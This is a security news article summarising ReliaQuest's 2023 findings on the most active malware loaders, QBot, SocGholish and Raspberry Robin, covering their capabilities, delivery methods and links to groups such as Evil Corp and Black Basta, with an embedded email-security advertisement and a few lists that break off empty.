SOC teams find malware loaders challenging, as the different loaders, even for the same malware, need distinct mitigation.
Besides this, they are the key and most important elements for initial network access and payload delivery, for which remote-access software and post-exploitation tools are most sought.
Detecting a malware loader doesn’t always mean network compromise, as sometimes, in the kill chain, it’s stopped early.
However, cybersecurity analysts at ReliaQuest have recently uncovered a multitude of malware loaders that were observed to be the most active this year in 2023.
Unveiled Malware Loaders
Here below, we have mentioned all the malware loaders that were unveiled recently by the cybersecurity experts at ReliaQuest:-
Among them, the top 3 malware loaders that were observed to be the most active by the security researchers are:-
- QBot (aka QakBot, QuackBot, Pinkslipbot)
- SocGholish (aka FakeUpdates)
- Raspberry Robin
Technical Analysis of Top 3 Malware Loaders
Here below, we have mentioned the technical analysis of all the top 3 malware loaders:-
Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware
QakBot started as a banking trojan and swiftly evolved with more functions. Beyond network entry, it does the following things:-
- Spreads payloads
- Steals data
- Aids lateral movement
- Enables remote execution
Qbot is linked to the “Black Basta” ransomware gang, and it operates discovery, C2 communication, info relay, and payload drop for post-exploitation goals.
QakBot swiftly adapted to Microsoft’s MOTW with HTML smuggling. It also shifted payload file types, even using OneNote files in a Feb 2023 campaign against US entities.
SocGholish is tied to the Russia-based group “Evil Corp,” which targets US industries like-
Apart from this, It’s also connected to “Exotic Lily,” an initial access broker, selling access gained through phishing to other threat actors, including ransomware groups.
This malware loader emerged in 2022, spreading through compromised websites and social engineering. With just a few clicks, it can impact entire domains or networks, and in 2023, it launched several watering hole attacks aggressively.
Raspberry Robin is a highly elusive worm-turned-loader that targets users and entities using Microsoft Windows OS. It spreads through malicious USB devices, using LNK files to trigger native Windows processes and download its DLL.
Moreover, this malware loader uses many techniques to evade detection, including creating scheduled tasks and code injection.
Raspberry Robin is linked to multiple dangerous groups, including Evil Corp and Silence (aka Whisper Spider).
In addition to the Cobalt Strike tool, Raspberry Robin is used by threat actors to deliver multiple variants of ransomware and other malware like-
Moreover, the Raspberry Robin malware loader is also linked to SocGholish ops in legal and financial services organizations in Q1 2023, signaling crime syndicate collab.